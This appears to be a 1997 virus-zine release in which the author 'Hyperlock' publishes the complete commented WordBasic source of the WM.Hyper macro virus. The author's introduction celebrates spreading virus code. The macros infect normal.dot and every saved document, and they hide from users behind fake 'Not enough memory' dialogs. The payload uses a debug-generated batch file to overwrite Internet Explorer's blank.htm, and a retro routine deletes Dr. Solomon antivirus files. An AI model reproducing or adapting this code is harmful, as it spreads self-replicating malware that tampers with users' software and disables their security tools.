SLAM2.026: WordMacro Virus Hyper by Hyperlock [SLAM]
[WordMacro.Hyper]
Identification:
- VIRUSNAME: WM.Hyper
- SIZE: 22,528 Bytes (9 Macros)
- VERSION: v1.01
- ORIGIN: United Kingdom
- AUTHOR: Hyperlock
- DATE: March, 1997
Characteristics:
- Polymorphism: Yes
- Stealth: Yes
- Encrypted: Yes, this file isn't but see virii.zip for encrypted version
- Retro: Yes, but only targeting Dr. Solomon
- External Infection: Yes, Microsoft Internet Explorer
INTRODUCTION
This virus has been written to demonstrate some of the ideas that have been rattling around my head for a while. Some of the concepts you will have seen before, whereas others you definitely will not have. I have another virus in the making, implementing many of the features I had to leave out of this one. But hey, the more virus code out there the better.
Your comments are welcome.
The virus morphs the payload macro. The macro names that are the same as the built-in ones are not morphed. The stealth is simple but effective. It captures both calls for the macro organiser through Tools/Macro and Files/Template. Most virii don't capture Files/Template so I thought it was about time. This makes it a bit of a pain to remove once infection has occurred, so as always make sure your normal.dot is backed-up somewhere else. There are other ways of removing it, but more on those techniques another time.
It will be encrypted, but because it is a bit of a pain, but not hard, to decrypt it, it is here in text format. The virus does have retro as part of the payload, but targets Dr. Solomon's Findvirus only. It determines if it exists and then removes it, but only after certain conditions are met.
As its payload it infects Microsoft Internet Explorer. This is really just for demo purposes; I'm sure something can be done with it. All it does is make a scrolling marquee in HTML when it cannot find your modem. This can, of course, be changed to do almost anything in JavaScript, VBScript or HTML. More in this later. As far as I am aware, this is the first virus to infect Internet Explorer in this way.
The virus consists of the following 9 macros:
- AutoExec
- AutoOpen
- AutoClose
- FileSave
- FileSaveAs
- FileTemplates
- ToolsMacro
- EditAutotext
- Hyper (identifier mutates in normal.dot)
HOW IT WORKS
OK, here is the run down on how the virus propagates, infects and mutates. I have commented the code enough to make it readable to a reasonable programmer. If you can't follow it, then takes some lessons in Word Basic.
The AutoOpen macro executes when a document is opened. It copies all macros to normal.dot, and calls the mt$ function to mutate the payload macro (hyper). Notice the use of AutoText to store the mutated macro name; this method was chosen so that it cannot be deleted externally to word, e.g., in an INI file. To prevent anyone touching the macro name, note the use of the EditAutoText macro, which has been used to disable it.
An INI file "nostrad.ini" is created and contains an infection counter and other info. You can have a go at deciphering the copyright info if you want, shouldn't be too hard.
AutoClose operates in the same way as AutoOpen, and uses the AutoOpen profile and mutation macros. It checks for the existence of the mutation string in AutoText and uses it if it exists. The AutoExec macro was left empty on purpose, I didn't want a particular virus messing about when mine is doing its stuff. What can I say, shit happens.
OK, moving on to the FileSave and FileSaveAs macros; these are almost the same except that FileSave forces a document to be saved as a template without checking what it is before hand. It is the fasted way for the thing to run. There is no point is checking for this. These macros copy all virus macros from normal.dot to the victim template, disguised as a document, of course. The payload macro, stored in the form Mxxxx in normal.dot is saved as hyper in the victim template.
FileTemplates and ToolsMacro are the two most accessible methods for viewing macros. Hence, these are disabled. Normally, FileTemplates is not touched, but it is now. EditAutoText is used to prevent the deletion of the macro mutation identifier, because it is stored internally as an autotext entry. AutoText entries can also be deleted using the macro organiser, but it has been disabled anyway using FileTemplates and ToolsMacro macros!
THE PAYLOAD
Last, but not least, we have the payload macro 'hyper'. The macro name mutates to be of the form 'Mxxxx' in normal.dot, where xxxx is a random number. It infects Microsoft Internet Explorer using HTML and JavaScript to do so. Note that this payload is an example of how to do this, hence the HTML is pretty small and just displays and scrolling marquee. It also has a retro element, where it searches for Dr. Solomon AV and removes it if certain conditions are met. It is executed by AutoOpen and AutoClose.
OK, it uses debug to create a file which, when copied, becomes blank.htm. Note that this htm file is loaded by IE when it cannot find a modem when it is launched or if a site is found to be invalid on the initial load of IE. There are other conditions when blank.htm is used, but these are the most common.
It creates a debug input script and a batch file. The batch file executes debug and feeds in the script, creating hyper.dat as the output. This file will then be copied to windows/system as the new blank.dat. The last thing the batch file does is create a flag file. This flag file is needed because when the batch file is shelled, the rest of the macro in word continues to execute, so a loop is used to check for the creation of this flag file. Once found, all work files in windows\temp of the form hyp*.* are removed (gotta keep the place tidy!).
The last part of the payload is the retro part. It deletes Dr. Solomon FindViru if it exists when the infection counter is < 5 or every 10th infection. Well, gotta give someone a chance to delete it!
Anyway, enough of this crap, the code is below. Enjoy.
Regards,
Hyperlock
VIRUS CODE
------------------------------------------------------------------------------
Macro: AutoOpen
REM
REM WM.Hyper virus
REM
REM On AutoOpen of document, copy all macros to normal.dot
REM Occurs each time you open an existing document
REM
Sub MAIN
On Error Goto endsub
DisableInput 1
REM stop message on change of normal.dot
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
REM mutate payload name if one does not exist in system
pay$ = GetAutoText$("wm.hyper", 0)
If pay$ = "" Then
pay$ = mt$
SetAutoText("wm.hyper", pay$, 0)
End If
REM copy macros
ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec",1
MacroCopy ct$ + ":autoclose", "global:autoclose",1
MacroCopy ct$ + ":autoopen", "global:autoopen",1
MacroCopy ct$ + ":filesaveas", "global:filesaveas",1
MacroCopy ct$ + ":filesave", "global:filesave",1
MacroCopy ct$ + ":editautotext", "global:editautotext",1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro",1
MacroCopy ct$ + ":filetemplates", "global:filetemplates",1
MacroCopy ct$ + ":hyper", "global:" + pay$,1
profupdate
hyper
endsub:
End Sub
REM
REM Maintain a counter of infections
REM
Sub profupdate
entry$ = GetPrivateProfileString$("virus", "hyper_counter", "nostrad.ini")
If entry$ = "" Then
SetPrivateProfileString("virus", "hyper_counter", "1", "nostrad.ini")
SetPrivateProfileString("virus", "author", "Hyperlock", "nostrad.ini")
c$ = "0400990410"
c$ = c$ + "3207212111"
c$ = c$ + "2101114108"
c$ = c$ + "1110991070"
c$ = c$ + "4403207709"
c$ = c$ + "7114099104"
c$ = c$ + "0320490570"
c$ = c$ + "57055"
SetPrivateProfileString("virus", "copyright", c$, "nostrad.ini")
Else
a = Val(entry$) + 1
entry$ = Str$(a)
SetPrivateProfileString("virus", "hyper_counter", entry$, "nostrad.ini")
End If
End Sub
REM
REM Mutate macro identifiers, except auto, edit and file macros
REM
Function mt$
m$ = ""
While Len(m$) <= 2
m$ = getrnd$
Wend
mt$ = "M" + LTrim$(m$)
End Function
Function getrnd$
i = Rnd() * 4096
j = Rnd() * 512
x = Int(Rnd() * (j - i) + i)
getrnd$ = Str$(x)
End Function
------------------------------------------------------------------------------
Macro: AutoClose
REM
REM WM.Hyper virus
REM
REM Autoclose macro
REM Occurs each time you close a document
REM
Sub MAIN
On Error Goto endsub
DisableInput 1
REM stop message on change of normal.dot
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
REM mutate payload name if one does not exist in system
pay$ = GetAutoText$("wm.hyper", 0)
If pay$ = "" Then
pay$ = autoopen.mt$
SetAutoText("wm.hyper", pay$, 0)
End If
REM copy macros
ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec",1
MacroCopy ct$ + ":autoclose", "global:autoclose",1
MacroCopy ct$ + ":autoopen", "global:autoopen",1
MacroCopy ct$ + ":filesaveas", "global:filesaveas",1
MacroCopy ct$ + ":filesave", "global:filesave",1
MacroCopy ct$ + ":editautotext", "global:editautotext",1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro",1
MacroCopy ct$ + ":filetemplates", "global:filetemplates",1
MacroCopy ct$ + ":hyper", "global:" + pay$,1
autoopen.profupdate
hyper
endsub:
End Sub
------------------------------------------------------------------------------
Macro: AutoExec
REM
REM WM.Hyper virus
REM Version: 1.01
REM
Sub MAIN
End Sub
------------------------------------------------------------------------------
Macro: FileSave
REM
REM WM.Hyper virus
REM
REM Catch FileSave and refresh if possible
REM
Sub MAIN
On Error Goto endsub
REM stops error 24 when macros already exist
REM stop message on change of normal.dot, just in case
REM user changed it and set document flag as changed
DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty
REM Force document to be a template (change to template and save)
Dim dlg As FileSaveAs
GetCurValues dlg
dlg.Format = 1
FileSaveAs dlg
REM copy macros to local document template
ct$ = FileName$()
pay$ = GetAutoText$("wm.hyper", 0)
MacroCopy "global:autoexec", ct$ + ":autoexec",1
MacroCopy "global:autoclose", ct$ + ":autoclose",1
MacroCopy "global:autoopen", ct$ + ":autoopen",1
MacroCopy "global:filesaveas", ct$ + ":filesaveas",1
MacroCopy "global:filesave", ct$ + ":filesave",1
MacroCopy "global:editautotext", ct$ + ":editautotext",1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro",1
MacroCopy "global:filetemplates", ct$ + ":filetemplates",1
MacroCopy "global:" + pay$, ct$ + ":hyper",1
autoopen.profupdate
FileSave
REM bypass the if statement below
Err = 102
endsub:
If Err <> 102 Then
FileSave
End If
End Sub
------------------------------------------------------------------------------
Macro: FileSaveAs
REM
REM WM.Hyper virus
REM
REM FileSaveAs Macro
REM
Sub MAIN
On Error Goto endsub
DisableInput 1
REM stop message on change of normal.dot, just in case
REM user changed it and set document flag as changed
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty
REM get the values for the filesaveas dialog
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
REM set doc type to be a template regardless of current type
dlg.Format = 1
REM copy macros to local document template
ct$ = FileName$()
pay$ = GetAutoText$("wm.hyper", 0)
MacroCopy "global:autoexec", ct$ + ":autoexec",1
MacroCopy "global:autoclose", ct$ + ":autoclose",1
MacroCopy "global:autoopen", ct$ + ":autoopen",1
MacroCopy "global:filesaveas", ct$ + ":filesaveas",1
MacroCopy "global:filesave", ct$ + ":filesave",1
MacroCopy "global:editautotext", ct$ + ":editautotext",1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro",1
MacroCopy "global:filetemplates", ct$ + ":filetemplates",1
MacroCopy "global:" + mn$, ct$ + ":hyper",1
autoopen.profupdate
REM save new file settings now replication is complete
FileSaveAs dlg
REM bypass the if statement below
Err = 102
endsub:
If Err <> 102 Then
FileSaveAs dlg
End If
End Sub
------------------------------------------------------------------------------
Macro: FileTemplates
REM
REM WM.Hyper virus
REM
REM FileTemplates macro
REM
Sub MAIN
MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)
End Sub
------------------------------------------------------------------------------
Macro: ToolsMacro
REM
REM WM.Hyper virus
REM
REM ToolsMacro macro
REM
Sub MAIN
MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)
End Sub
------------------------------------------------------------------------------
Macro: EditAutotext
REM
REM WM.Hyper virus
REM
REM Disable Edit/Autotext
REM This is so that the mutation marker cannot be altered
REM or deleted. The toolsmacro and filetemplates macros
REM block the other routes to the autotext, which can be
REM changed through the organizer.
REM
Sub MAIN
MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)
End Sub
------------------------------------------------------------------------------
Macro: Hyper (local document), mutates in normal.dot to Mxxxx
REM
REM WM.Hyper virus
REM
REM This macro name will mutate.
REM This is the payload. It infects Microsoft Internet Explorer
REM through HTML in blank.htm, which is loaded if cannot find a
REM modem or if a site is initially invalid, amongst others.
REM
Sub MAIN
DisableInput 1
DisableAutoMacros 0
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
REM windows temp dir
p$ = DefaultDir$(13)
Open p$ + "\hyper.dbg" For Output As #1
Print #1, "n hyper.dat"
Print #1, "e 0100 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54"
Print #1, "e 0110 49 54 4c 45 3e 4d 69 63 72 6f 73 6f 66 74 20 49"
Print #1, "e 0120 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72"
Print #1, "e 0130 3c 2f 54 49 54 4c 45 3e 0a 3c 53 43 52 49 50 54"
Print #1, "e 0140 20 4c 41 4e 47 55 41 47 45 3d 22 4a 61 76 61 53"
Print #1, "e 0150 63 72 69 70 74 22 3e 0a 3c 21 2d 2d 0a 66 75 6e"
Print #1, "e 0160 63 74 69 6f 6e 20 64 73 28 29 0a 7b 0a 77 69 6e"
Print #1, "e 0170 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 57 4d"
Print #1, "e 0180 2e 48 79 70 65 72 20 68 61 73 20 6e 6f 77 20 69"
Print #1, "e 0190 6e 66 65 63 74 65 64 20 57 6f 72 64 20 61 6e 64"
Print #1, "e 01a0 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72"
Print #1, "e 01b0 65 72 21 22 3b 0a 7d 0a 2d 2d 3e 0a 3c 2f 53 43"
Print #1, "e 01c0 52 49 50 54 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42"
Print #1, "e 01d0 4f 44 59 20 6f 6e 4c 6f 61 64 3d 22 64 73 28 29"
Print #1, "e 01e0 3b 22 3e 0a 3c 54 41 42 4c 45 20 57 49 44 54 48"
Print #1, "e 01f0 3d 36 32 30 20 43 45 4c 4c 50 41 44 44 49 4e 47"
Print #1, "e 0200 3d 30 20 43 45 4c 4c 53 50 41 43 49 4e 47 3d 30"
Print #1, "e 0210 20 42 4f 52 44 45 52 3d 30 3e 0a 3c 54 52 3e 0a"
Print #1, "e 0220 3c 54 44 3e 0a 3c 46 4f 4e 54 20 46 41 43 45 3d"
Print #1, "e 0230 22 41 72 69 61 6c 22 20 53 49 5a 45 3d 32 3e 0a"
Print #1, "e 0240 3c 4d 41 52 51 55 45 45 20 57 49 44 54 48 3d 36"
Print #1, "e 0250 30 30 20 53 43 52 4f 4c 4c 44 45 4c 41 59 3d 38"
Print #1, "e 0260 30 20 42 4f 52 44 45 52 3d 30 3e 0a 59 6f 75 72"
Print #1, "e 0270 20 73 79 73 74 65 6d 20 68 61 73 20 62 65 65 6e"
Print #1, "e 0280 20 69 6e 66 65 63 74 65 64 20 77 69 74 68 20 74"
Print #1, "e 0290 68 65 20 57 4d 2e 48 79 70 65 72 20 76 69 72 75"
Print #1, "e 02a0 73 2e 20 0a 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b"
Print #1, "e 02b0 65 20 79 6f 75 20 61 72 65 20 67 6f 6e 6e 61 20"
Print #1, "e 02c0 68 61 76 65 20 74 6f 20 74 61 6b 65 20 73 6f 6d"
Print #1, "e 02d0 65 20 72 65 6d 65 64 69 61 6c 20 61 63 74 69 6f"
Print #1, "e 02e0 6e 20 2e 2e 2e 20 0a 28 63 29 20 48 79 70 65 72"
Print #1, "e 02f0 6c 6f 63 6b 2c 20 4d 61 72 63 68 20 31 39 39 37"
Print #1, "e 0300 0a 3c 2f 4d 41 52 51 55 45 45 3e 0a 3c 2f 46 4f"
Print #1, "e 0310 4e 54 3e 0a 3c 2f 54 44 3e 0a 3c 2f 54 52 3e 0a"
Print #1, "e 0320 3c 2f 54 41 42 4c 45 3e 0a 3c 2f 42 4f 44 59 3e"
Print #1, "e 0330 0a 3c 2f 48 54 4d 4c 3e"
Print #1, "rcx"
Print #1, "0238"
Print #1, "w"
Print #1, "q"
Close #1
REM create batch file to move from Windows temp directory to windows/system,
Open p$ + "\hypconv.bat" For Output As #1
Print #1, "@cd " + p$
Print #1, "@debug < " + "hyper.dbg > hyptemp"
Print #1, "@move " + "hyper.dat " + "..\system\blank.htm"
Print #1, "@copy hyptemp hypflag"
Print #1, "@exit"
Close #1
Shell p$ + "\hypconv.bat", 0
REM wait for batch file to finish, then delete all work files
While Files$(p$ + "\hypflag") = ""
Wend
Kill p$ + "\hyp*.*"
REM Retro - every 10th or first few infections, delete Dr. Solomon.
REM Got to give them a chance to delete Hyper!
c$ = GetPrivateProfileString$("virus", "hyper_counter", "nostrad.ini")
If c$ <> "" Then
If Val(c$) Mod 10 = 0 Or Val(c$) < 5 Then
If Files$("c:\toolkit\findviru.*") <> "" Then
Kill "c:\toolkit\findviru.*"
End If
End If
End If
End Sub
------------------------------------------------------------------------------
-- Hyperlock, March 1997 --
------------------------------------------------------------------------------